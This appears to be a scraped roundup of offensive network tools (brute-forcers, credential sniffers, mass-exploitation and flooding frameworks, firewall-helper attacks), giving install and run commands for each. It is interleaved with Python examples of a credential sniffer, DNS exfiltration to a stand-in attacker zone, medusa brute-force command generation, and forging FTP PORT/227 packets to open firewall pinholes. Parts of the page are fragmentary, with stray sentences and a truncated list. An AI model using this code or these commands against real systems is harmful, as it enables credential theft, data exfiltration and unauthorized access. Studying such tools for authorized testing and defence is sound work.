This tool was developed to help in the following case:
During the reconnaissance phase of an authorized penetration test at the network level, an open WiFi network is identified on which hosts are connected that expose Windows SMB shares (port 445 open), an FTP server or SSH access. The goal is to perform a quick evaluation, from a smartphone (easier to launch and hide than a laptop), of the attack surface represented by these services.
The application allows downloading and keeping password dictionaries, either from a predefined list of dictionaries or from the device itself (for tailored password dictionaries).
Follow these steps:
1. Create a JKS keystore with an RSA keypair.
2. Create a file named keystore.properties at the root folder level (same location as the gradlew file) with the following content:
storePassword=[StorePassword]
keyPassword=[KeyPassword]
keyAlias=[KeyAlias]
storeFile=[Store file full location, or location relative to the app sub folder]
For example:
# Configuration of the keystore used to sign the released APK
storePassword=fB5YDpcvTvQH7Sg399xG49YFK
keyPassword=gHTaEq93Xe93c3rWJu8v33WVB
keyAlias=keys
storeFile=../release-keystore.jks
Keep keystore.properties and the keystore itself out of version control: anyone holding them can sign an update that installs over the released APK.
3. Use the following command line:
gradlew clean cleanBuildCache assembleRelease
4. The APK is available in the folder [ROOT_FOLDER]/app/build/outputs/apk
The application should be combined with the following applications to enhance efficiency:
– FING: for WiFi network discovery and target identification,
– FILE MANAGER: to access Windows SMB shares, FTP and SSH (via SFTP) content once credentials have been identified,
– JUICE SSH: to access an SSH shell if SFTP is not enabled.
Use and Download:
git clone https://github.com/righettod/access-brute-forcer && cd access-brute-forcer
gradlew clean cleanBuildCache assembleDebug
Or download the APK binary here: https://rink.hockeyapp.net/apps/64dd8a3981644cfd9923617dc0d05989
+ URLs visited
+ POST loads sent
+ HTTP form logins/passwords
+ HTTP basic auth logins/passwords
+ HTTP searches
+ FTP logins/passwords
+ IRC logins/passwords
+ POP logins/passwords
+ IMAP logins/passwords
+ Telnet logins/passwords
+ SMTP logins/passwords
+ SNMP community string
+ NTLMv1/v2 hashes over all supported protocols: HTTP, SMB, LDAP, etc.
git clone https://github.com/DanMcInerney/net-creds && cd net-creds
pip install -r requirements.txt
sudo python net-creds.py -i eth0
sudo python net-creds.py -f 192.168.1.1
(-i sniffs a live interface; -f restricts the output to traffic involving the given IP.)
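The feature list above says what net-creds pulls out of a stream but not how such a sniffer recognises a credential once the TCP payload has been reassembled. The following is an added example, not net-creds' own code: it pairs FTP USER/PASS commands, decodes an HTTP Basic Authorization header and picks the login/password pair out of a form POST. The field-name lists and the three sample payloads are constructed for the example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs

# Field names that usually carry a login or password in HTML forms (assumed list, extend as needed).
USER_FIELDS = ("username", "user", "login", "email", "uname")
PASSWORD_FIELDS = ("password", "pass", "passwd", "pwd")
REQUEST_LINE = re.compile(r"^(GET|POST|PUT)\s+\S+\s+HTTP/1\.[01]\r?\n", re.I)

# Constructed sample payloads, standing in for reassembled client-to-server TCP streams.
FTP_SAMPLE = "USER alice\r\nPASS s3cret\r\nSYST\r\n"
HTTP_BASIC_SAMPLE = ("GET /admin HTTP/1.1\r\nHost: intranet.example\r\n"
                     "Authorization: Basic " + base64.b64encode(b"bob:hunter2").decode() + "\r\n\r\n")
HTTP_FORM_SAMPLE = ("POST /login HTTP/1.1\r\nHost: app.example\r\n"
                    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                    "username=carol&password=p%40ss&remember=1")


def creds_from_ftp(stream):
    """Pair USER and PASS commands from one FTP control-channel stream (client side)."""
    found, user = [], None
    for line in stream.splitlines():
        verb, _, arg = line.partition(" ")
        if verb.upper() == "USER":
            user = arg.strip()
        elif verb.upper() == "PASS" and user is not None:
            found.append(("ftp", user, arg.strip()))
            user = None          # a PASS without a preceding USER is ignored
    return found


def creds_from_http(request):
    """Pull Basic-auth and form logins out of one HTTP request (headers + body)."""
    head, _, body = request.partition("\r\n\r\n")
    found = []
    m = re.search(r"^Authorization:\s*Basic\s+(\S+)", head, re.I | re.M)
    if m:
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            user, _, pw = decoded.partition(":")
            found.append(("http-basic", user, pw))
        except binascii.Error:
            pass                 # malformed header, not a credential
    if head.upper().startswith("POST") and "application/x-www-form-urlencoded" in head.lower():
        fields = {k.lower(): v[0] for k, v in parse_qs(body).items()}
        user = next((fields[k] for k in USER_FIELDS if k in fields), None)
        pw = next((fields[k] for k in PASSWORD_FIELDS if k in fields), None)
        if user is not None and pw is not None:
            found.append(("http-form", user, pw))
    return found


def extract_credentials(payload):
    """Dispatch a reassembled TCP payload to the right parser based on what it looks like."""
    if REQUEST_LINE.match(payload):
        return creds_from_http(payload)
    return creds_from_ftp(payload)
```

The dispatch is deliberately content-based rather than port-based: the same logic works on a pcap whether the FTP server listens on 21 or 2121, which is also why such sniffers catch credentials on non-standard ports.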
Shodanwave is a tool for exploring and obtaining information from cameras, specifically Netwave IP cameras. The tool uses the Shodan search engine, which makes it easy to find cameras online.
What does the tool do?
+ Brute force
+ SSID and WPAPSK Password Disclosure
+ E-mail, FTP, DNS, MSN Password Disclosure
This is an example of Shodanwave running: the password was not found by brute force, so the tool tries to leak the camera's memory. If the tool finds the password it does not try to leak the memory.
+ Shodan API key: https://www.shodan.io/
git clone https://github.com/fbctf/shodanwave && cd shodanwave
pip install -r requirements.txt
create user.txt (username dictionary)
create password.txt (password dictionary)
python shodanwave.py -u user.txt -w password.txt -k <your shodan api key>
V3n0M is a free and open source scanner. Evolved from baltazar's scanner, it has adapted several new features that improve functionality and usability. It is mostly experimental software.
This program is for finding and exploiting various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.
Very useful for:
– Cloudflare Resolver[Cloudbuster]
– Metasploit Modules Scans[To be released]
– LFI->RCE and XSS Scanning[LFI->RCE & XSS]
– SQL Injection Vuln Scanner[SQLi]
– Extremely Large D0rk Target Lists
– AdminPage Finding
– Toxin Vulnerable FTPs Scanner
– DNS BruteForcer
– Python 3.6 Asyncio based scanning
git clone https://github.com/v3n0m-Scanner/V3n0M-Scanner && cd V3n0M-Scanner
python3 setup.py install --user
cd src
python3 v3nom.py
penthefire – Security tool implementing attacks to test the resistance of a firewall.
Spoofed attack: when a data packet is received, the attacker sends a forged DCC command.
Abusive usage: the client connection is opened by the attacker himself. He connects to the FTP server behind the firewall and initiates a real session; once the session is set up, he launches the attack by sending a forged 227 reply (a 229 reply when using IPv6).
– Python 2.7.x with the NetfilterQueue module
How to use:
Install dependencies (Debian/Ubuntu base system):
apt-get install build-essential python-dev libnetfilter-queue-dev
pip install NetfilterQueue
git clone https://github.com/BREAKTEAM/penthefire && cd penthefire
Example:
python wolffirewall.py --attacker -t 192.168.22.2 --helper ftp --port 29 -v -i eth0 192.168.22.2
python client.py -t 192.168.22.2 --port 29
It has four (4) levels of testing.
– INFORMATIONAL: Tells you if it can connect to ports on the internet.
– LEVEL 0: Tells you if it can FTP a file to the internet in cleartext.
– LEVEL 1: Tells you if it can SCP files to the internet over various ports.
– LEVEL 2: Tells you if it can send the same sensitive file to the internet via DNS queries.
It does each of these in succession and then reports on which levels it failed to block.
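LEVEL 2 is the one that surprises most egress policies: DNS is almost always allowed out, and a file fits into the labels of ordinary-looking queries. The block below is an added example (not egression's own dnsfilexfer code) of the encoding side of that test: it chunks a file into base32 labels that respect the 63-octet label and 253-character name limits, reassembles it from the queries the resolver would see, and shows the crude heuristic a defender can apply to spot such names. The domain exfil.example.net and the CSV content are constructed for the example.

```python
import base64
import math

LABEL_MAX = 63    # RFC 1035: a single label is at most 63 octets
NAME_MAX = 253    # practical maximum for a full domain name in text form
B32_ALPHABET = set("abcdefghijklmnopqrstuvwxyz234567")

# Constructed "sensitive file" (50 bytes) and assumed attacker-controlled zone.
SAMPLE_FILE = b"employee_id,ssn\n1001,123-45-6789\n1002,987-65-4321\n"
EXFIL_DOMAIN = "exfil.example.net"


def encode_file(data, domain, chunk_size=30):
    """Turn raw bytes into the query names an exfiltration client would resolve.

    Each chunk becomes <seq>.<base32 chunk>.<domain>. Base32 is used because DNS
    names are case-insensitive and must stay within the hostname character set;
    30 bytes encode to 48 base32 characters, comfortably under the label limit.
    """
    names = []
    for seq, offset in enumerate(range(0, len(data), chunk_size)):
        chunk = base64.b32encode(data[offset:offset + chunk_size]).decode("ascii")
        label = chunk.rstrip("=").lower()          # padding is recomputed on decode
        name = f"{seq}.{label}.{domain}"
        if len(label) > LABEL_MAX or len(name) > NAME_MAX:
            raise ValueError("chunk_size too large for a DNS label")
        names.append(name)
    return names


def decode_queries(names, domain):
    """Reassemble the file from (possibly reordered or duplicated) query names."""
    suffix = "." + domain
    chunks = {}
    for name in names:
        if not name.endswith(suffix):
            continue                                # unrelated query, skip
        seq, _, label = name[:-len(suffix)].partition(".")
        padded = label.upper() + "=" * (-len(label) % 8)
        chunks[int(seq)] = base64.b32decode(padded)
    return b"".join(chunks[k] for k in sorted(chunks))


def looks_like_exfil(name, min_label=40):
    """Cheap detection heuristic for the blue team: a long label made only of base32
    characters is rare in legitimate hostnames. The threshold is an assumption; tune it."""
    return any(len(label) >= min_label and set(label) <= B32_ALPHABET
               for label in name.lower().split("."))


def queries_required(size, chunk_size=30):
    """Number of queries a file of `size` bytes needs: the volume a DNS log would show."""
    return math.ceil(size / chunk_size)
```

Running encode_file(SAMPLE_FILE, EXFIL_DOMAIN) yields two names; resolving them against a server authoritative for the zone is the whole "transfer". The defensive point is that blocking ports is not enough: the check that matters is whether the resolver allows recursion to arbitrary external zones and whether query volume and label shape are monitored.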
+ Python 2.7.x
+ nc, curl and git
git clone https://github.com/danielmiessler/egression && cd egression
cd dnsfilexfer
sudo pip install -r requirements.txt
cd ..
./egression.sh
git clone https://github.com/frizb/Vanquish && cd Vanquish
python Vanquish2.py
This tool will perform an Nmap scan, or import the results of a scan from Nexpose, Nessus, or Nmap. The processed results will be used to launch exploit and enumeration modules according to the configurable Safe Level and the enumerated service information.
All module results are stored on localhost and are part of APT2‘s Knowledge Base (KB). The KB is accessible from within the application and allows the user to view the harvested results of an exploit module.
APT2 uses the default.cfg file in the root directory. Edit this file to configure APT2 to run as you desire. Current options include:
anonftp Test for Anonymous FTP
anonldap Test for Anonymous LDAP Searches
crackPasswordHashJohnTR Attempt to crack any password hashes
gethostname Determine the hostname for each IP
httpoptions Get HTTP Options
httpscreenshot Get Screen Shot of Web Pages
httpserverversion Get HTTP Server Version
hydrasmbpassword Attempt to bruteforce SMB passwords
impacketsecretsdump Test for NULL Session
msf_dumphashes Gather hashes from MSF Sessions
msf_gathersessioninfo Get Info about any new sessions
msf_javarmi Attempt to Exploit A Java RMI Service
msf_ms08_067 Attempt to exploit MS08-067
msf_openx11 Attempt Login To Open X11 Service
msf_smbuserenum Get List of Users From SMB
msf_snmpenumshares Enumerate SMB Shares via LanManager OID Values
msf_snmpenumusers Enumerate Local User Accounts Using LanManager/psProcessUsername OID Values
msf_snmplogin Attempt Login Using Common Community Strings
msf_vncnoneauth Detect VNC Services with the None authentication type
nmapbasescan Standard NMap Scan
nmaploadxml Load NMap XML File
nmapms08067scan NMap MS08-067 Scan
nmapnfsshares NMap NFS Share Scan
nmapsmbshares NMap SMB Share Scan
nmapsmbsigning NMap SMB-Signing Scan
nmapsslscan NMap SSL Scan
nmapvncbrute NMap VNC Brute Scan
nullsessionrpcclient Test for NULL Session
nullsessionsmbclient Test for NULL Session
openx11 Attempt Login To Open X11 Service and Get Screenshot
reportgen Generate Report
responder Run Responder and watch for hashes
searchftp Search files on FTP
searchnfsshare Search files on NFS Shares
searchsmbshare Search files on SMB Shares
sslsslscan Determine SSL protocols and ciphers
ssltestsslserver Determine SSL protocols and ciphers
userenumrpcclient Get List of Users From SMB
Usage & download:
git clone https://github.com/MooseDojo/apt2 && cd apt2
pip install python-nmap
vi default.cfg (then edit it with your MSGRPC config; see https://help.rapid7.com/metasploit/Content/api-rpc/getting-started-api.html)
./apt2.py
Upgrade:
git pull origin master
Source: https://github.com/MooseDojo | Our Post Before
Usage of apt2 for attacking infrastructures without prior mutual consent can be considered an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. The authors assume no liability and are not responsible for any misuse or damage caused by this program.
+ Python 2.7.x
git clone https://github.com/x90skysn3k/brutespray && cd brutespray
First run an nmap scan with -oG nmap.gnmap (or -oA nmap, which also writes nmap.gnmap).
Help: python brutespray.py -h
Example: python brutespray.py --file nmap.gnmap --services all --threads 3 --hosts 5
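The step brutespray automates is reading the greppable nmap output, keeping only open ports whose service has a brute-force module, and handing each target to medusa. The following is an added example of that pipeline and not brutespray's own code: the gnmap sample is constructed, and the service-to-module table is an assumed subset. The medusa flags used (-h, -n, -M, -U, -P, -t) are medusa's real ones.

```python
import re
from collections import defaultdict

# Constructed greppable-output sample standing in for a real nmap.gnmap file.
SAMPLE_GNMAP = """# Nmap 7.80 scan initiated (constructed sample)
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 7.9/, 80/open/tcp//http//nginx/\tIgnored State: closed (997)
Host: 10.0.0.7 ()\tStatus: Up
Host: 10.0.0.7 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2/, 445/open/tcp//microsoft-ds//Samba smbd 4.9/, 3306/filtered/tcp//mysql///
# Nmap done (constructed sample)
"""

# nmap service names that map onto a medusa module (assumed subset of what brutespray supports).
SERVICE_TO_MODULE = {
    "ftp": "ftp", "ssh": "ssh", "telnet": "telnet", "vnc": "vnc",
    "mysql": "mysql", "postgresql": "postgres", "imap": "imap", "pop3": "pop3",
    "smtp": "smtp", "microsoft-ds": "smbnt", "ms-sql-s": "mssql", "snmp": "snmp",
}

HOST_RE = re.compile(r"^Host:\s+(\S+)")
# One port/state/protocol/owner/service/rpcinfo/version/ entry of the Ports: field.
PORT_RE = re.compile(r"(\d+)/([\w|]+)/(\w+)/[^/]*/([^/]*)/")


def parse_gnmap(text):
    """Map medusa module -> list of (host, port) for every open port with a known service."""
    targets = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue                                  # comments and Status-only lines
        host = HOST_RE.match(line).group(1)
        ports_field = line.split("Ports:", 1)[1].split("\t")[0]
        for port, state, _proto, service in PORT_RE.findall(ports_field):
            module = SERVICE_TO_MODULE.get(service)
            if state != "open" or module is None:     # filtered/closed or unsupported service
                continue
            targets[module].append((host, int(port)))
    return dict(targets)


def medusa_commands(targets, userlist, passlist, threads=3):
    """One medusa invocation per target, as argv lists ready for subprocess.run()."""
    cmds = []
    for module, hosts in targets.items():
        for host, port in hosts:
            cmds.append(["medusa", "-h", host, "-n", str(port), "-M", module,
                         "-U", userlist, "-P", passlist, "-t", str(threads)])
    return cmds
```

Keep --threads low against anything with a lockout policy: the parser above tells you how many distinct hosts and services you are about to hit, which is the number to sanity-check against the engagement's rules before launching.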
The main goal of this project is to audit as many systems as possible country-wide or across a wide IP range.
+ Discovery: discover FTP, SSH, Telnet, RDP and MySQL services running in a specific country or IP range via Shodan and Censys. It is also possible to discover running services on an IP range manually with the integrated masscan tool.
+ Brute Force: brute force the discovered services with the integrated ncrack tool. It ships wordlists that include the most popular combinations and default passwords for specific services.
+ Remote Command Execution: run system commands remotely on compromised devices.
+ SQL Injection Scanner: discover SQL injection vulnerabilities on websites with a specific country extension or with your custom Google dork.
+ Exploit Specific Vulnerabilities: discover vulnerable targets with Shodan, Censys or masscan and mass-exploit them with your own exploit or one of the included exploits.
+ Python version 2.7.x is required for running this program.
+ Supported platforms: Linux (Kali Linux, Debian, Ubuntu), macOS
Install
Kali Linux:
git clone https://github.com/leviathan-framework/leviathan.git && cd leviathan
pip install -r requirements.txt
Debian/Ubuntu:
git clone https://github.com/leviathan-framework/leviathan.git && cd leviathan
sudo bash scripts/debian_install.sh
Mac OS:
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
git clone https://github.com/leviathan-framework/leviathan.git && cd leviathan
bash scripts/macos_install.sh
Run:
python leviathan.py
Changelog v5.6.7 fix1:
+ Fixes to the build system.
+ Remove specific build block
It seems that this new check makes it FTBFS (fail to build from source) on armhf, armel, mips64el, x32 (all on linux).
T50 (f.k.a. F22 Raptor) is a tool designed to perform “Stress Testing”. The concept started in 2001, right after the release of ‘nb-isakmp.c’, and the main goal was:
– Having a tool to perform TCP/IP protocol fuzzing, covering common regular protocols such as ICMP, TCP and UDP.
Things have changed, and T50 became a unique resource capable of performing “Stress Testing”. After checking “/usr/include/linux”, some protocols were chosen to be part of its coverage:
a) ICMP – Internet Control Message Protocol
b) IGMP – Internet Group Management Protocol
c) TCP – Transmission Control Protocol
d) UDP – User Datagram Protocol
Why “Stress Testing”? Because when people design a new network infrastructure (e.g. a datacenter serving cloud computing) they think about:
b) Load Balancing
c) Backup Sites (Cold Sites, Hot Sites, and Warm Sites)
d) Disaster Recovery
e) Data Redundancy
f) Service Level Agreements
But almost nobody thinks about “Stress Testing”, or even performs any test to check how the network infrastructure behaves under stress, under overload, and under attack. Even during a Penetration Test, people prefer not running any kind of Denial-of-Service testing. Even worse, those people are missing one of the three key concepts of security that are common to risk management:
T50 was designed to perform “Stress Testing” on a variety of infrastructure network devices (Version 2.45), using widely implemented protocols, and after some requests it was re-designed to extend the tests (as of Version 5.3), covering some regular protocols (ICMP, TCP and UDP), some infrastructure-specific protocols (GRE, IPSec and RSVP), and some routing protocols (RIP, EIGRP and OSPF).
This new version (Version 5.3) is focused on internal infrastructure, which allows people to test the availability of its resources, covering:
a) Interior Gateway Protocols (Distance Vector Algorithm):
1. Routing Information Protocol (RIP)
2. Enhanced Interior Gateway Routing Protocol (EIGRP)
b) Interior Gateway Protocols (Link State Algorithm):
1. Open Shortest Path First (OSPF)
c) Quality-of-Service Protocols:
1. Resource ReSerVation Protocol (RSVP).
d) Tunneling/Encapsulation Protocols:
1. Generic Routing Encapsulation (GRE).
T50 is a powerful and unique packet injector tool, which is capable of:
a) Sending sequentially the following protocols:
1. ICMP – Internet Control Message Protocol
2. IGMPv1 – Internet Group Management Protocol v1
3. IGMPv3 – Internet Group Management Protocol v3
4. TCP – Transmission Control Protocol
5. EGP – Exterior Gateway Protocol
6. UDP – User Datagram Protocol
7. RIPv1 – Routing Information Protocol v1
8. RIPv2 – Routing Information Protocol v2
9. DCCP – Datagram Congestion Control Protocol
10. RSVP – Resource ReSerVation Protocol
11. GRE – Generic Routing Encapsulation
12. IPSec – Internet Protocol Security (AH/ESP)
13. EIGRP – Enhanced Interior Gateway Routing Protocol
14. OSPF – Open Shortest Path First
b) It is the only tool capable of encapsulating the protocols listed above within Generic Routing Encapsulation (GRE).
c) Sending a (quite) incredible number of packets per second, making it a “second to none” tool:
-> More than 1,000,000 pps of SYN Flood (+50% of the network uplink) on a 1000BASE-T network (Gigabit Ethernet).
-> More than 120,000 pps of SYN Flood (+60% of the network uplink) on a 100BASE-TX network (Fast Ethernet).
d) Performing “Stress Testing” on a variety of network infrastructure, network devices and security solutions in place.
e) Simulating “Distributed Denial-of-Service” and “Denial-of-Service” attacks, validating firewall rules, router ACLs, and Intrusion Detection System and Intrusion Prevention System policies.
The main differentiator of T50 is that it is able to send all protocols sequentially using one single SOCKET; besides, it can be used to modify network routes, letting IT security professionals perform advanced “Penetration Tests”.
git clone https://github.com/fredericopissarra/t50
cd t50
autoconf -f -i
./configure
make
cd release
./t50
Update:
cd <your clone folder>
git pull
Source : https://github.com/fredericopissarra | Our Post Before
+ Spoofed attack on helpers
+ Abusive usage of helpers
+ TTL attack on DPI solution
Description of the attack against helpers
Some network protocols use multiple connections for the exchange between a client and a server. The best-known example is FTP, where commands go through a connection on port 21 and data is exchanged in one of two modes (a connection from port 20, or a dynamically negotiated connection). Some firewalls implement an application layer gateway (ALG) to detect these parallel connections and authorize them dynamically. The alternatives are an application relay (transparent proxy) or opening every possible flow (read: almost everything).
The ALG analyses the traffic, detects and parses the commands exchanged between the peers to declare the parameters of the parallel connections, and then opens a temporary pinhole in the firewall to let the expected traffic through. The idea of this attack is to forge such messages so that the firewall opens pinholes that should never have been opened.
– The attacker's computer is on a network directly connected to the firewall.
– The firewall is susceptible to the attack (for example, Netfilter with rp_filter set to 0, so a packet whose source address does not belong behind the arriving interface is not dropped).
– The attacker is able to sniff a data packet (either by pcap sniffing or by running a data connection himself).
The sequence is as follows:
1. A sniffer on the attacker's network captures one packet from the protocol flow and:
+-+ reverses the Ethernet destination and source addresses,
+-+ increases the IP id and the TCP sequence number,
+-+ sets the payload to the wanted command (with the selected port).
2. The forged packet is sent on the interface connected to the firewall.
3. The firewall transmits the packet back to the client and is now expecting a packet with characteristics based on the attacker's input.
git clone https://github.com/regit/opensvp && cd opensvp
python setup.py install
opensvp -h
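Both the penthefire description (forged 227/229 replies) and the opensvp sequence above come down to the same thing: the helper parses a PORT, 227 or 229 message and opens a pinhole for whatever address and port it names. The block below is an added example written for this page, not opensvp's or penthefire's code. It parses those three messages the way a helper does, builds the forged payloads, rewrites a sniffed packet following the three steps listed above (the packet is a plain dict, and the exact IP-id and sequence increments are assumptions), and shows a sanity policy a hardened helper can apply. All addresses, MAC addresses and the scenario are constructed.

```python
import re

# The three FTP control-channel messages a firewall helper (ALG) parses to learn
# where a data connection will go.
PORT_RE = re.compile(r"^PORT\s+(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)", re.I)
PASV_RE = re.compile(r"^227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
EPSV_RE = re.compile(r"^229 .*?\(\|\|\|(\d+)\|\)")


def parse_pinhole(line, sender_ip):
    """Return the (ip, port) the helper would open for one control-channel line.

    PORT (client to server) and 227 (server to client) carry an explicit address;
    229 (EPSV, the IPv6-capable form) carries only a port, so the hole is toward
    whoever sent the line. Returns None for lines the helper does not act on.
    """
    m = PORT_RE.match(line) or PASV_RE.match(line)
    if m:
        a, b, c, d, hi, lo = (int(x) for x in m.groups())
        return f"{a}.{b}.{c}.{d}", hi * 256 + lo
    m = EPSV_RE.match(line)
    if m:
        return sender_ip, int(m.group(1))
    return None


def forge_port(ip, port):
    """Forged PORT command asking for a data connection to ip:port."""
    return "PORT {},{},{}\r\n".format(ip.replace(".", ","), port // 256, port % 256)


def forge_227(ip, port):
    """Forged passive-mode reply using the same h1,h2,h3,h4,p1,p2 encoding."""
    return "227 Entering Passive Mode ({},{},{}).\r\n".format(
        ip.replace(".", ","), port // 256, port % 256)


def forge_from_sniffed(pkt, command):
    """Rewrite a sniffed packet following the steps above: swap the Ethernet
    addresses, bump the IP id, advance the TCP sequence number past the sniffed
    payload and replace the payload. The IP header is kept as sniffed, which is
    what makes the forged packet look like it came from the other side."""
    return {
        "eth_src": pkt["eth_dst"], "eth_dst": pkt["eth_src"],
        "ip_src": pkt["ip_src"], "ip_dst": pkt["ip_dst"],
        "ip_id": (pkt["ip_id"] + 1) & 0xFFFF,                       # assumed increment
        "tcp_seq": (pkt["tcp_seq"] + len(pkt["payload"])) & 0xFFFFFFFF,  # next in-window seq
        "payload": command,
    }


def helper_accepts(hole, sender_ip, strict_addr=True, min_port=1024):
    """Sanity policy a hardened helper can apply before opening a pinhole (illustrative,
    not any product's code): the address must belong to the endpoint that sent the
    message (the idea behind nf_conntrack_ftp's loose=0) and the port must not be a
    privileged service port. Neither helps when the source IP itself is spoofed."""
    ip, port = hole
    if strict_addr and ip != sender_ip:
        return False
    return port >= min_port


def attack_scenario():
    """Constructed walk-through: client 10.0.0.5 has an FTP session with server
    203.0.113.10 through the firewall. The attacker on the client LAN sniffs a
    server-to-client packet, forges a 227 naming server port 22 and sends it at the
    firewall, which then expects 10.0.0.5 -> 203.0.113.10:22 as legitimate FTP data."""
    sniffed = {"eth_src": "02:00:00:00:00:01", "eth_dst": "02:00:00:00:00:05",  # fw -> client
               "ip_src": "203.0.113.10", "ip_dst": "10.0.0.5",
               "ip_id": 4711, "tcp_seq": 1000, "payload": "230 Login successful.\r\n"}
    forged = forge_from_sniffed(sniffed, forge_227("203.0.113.10", 22))
    hole = parse_pinhole(forged["payload"], forged["ip_src"])   # sender per IP header: the server
    return forged, hole, helper_accepts(hole, forged["ip_src"])
```

attack_scenario() returns the hole ('203.0.113.10', 22) and False: the address check passes, because the forged packet reuses the server's own source address, so only the port policy rejects it here. On the firewall the corresponding control is rp_filter=1, which drops a server-sourced packet arriving on the LAN interface before the helper ever sees it; that is exactly why the prerequisites above list rp_filter set to 0.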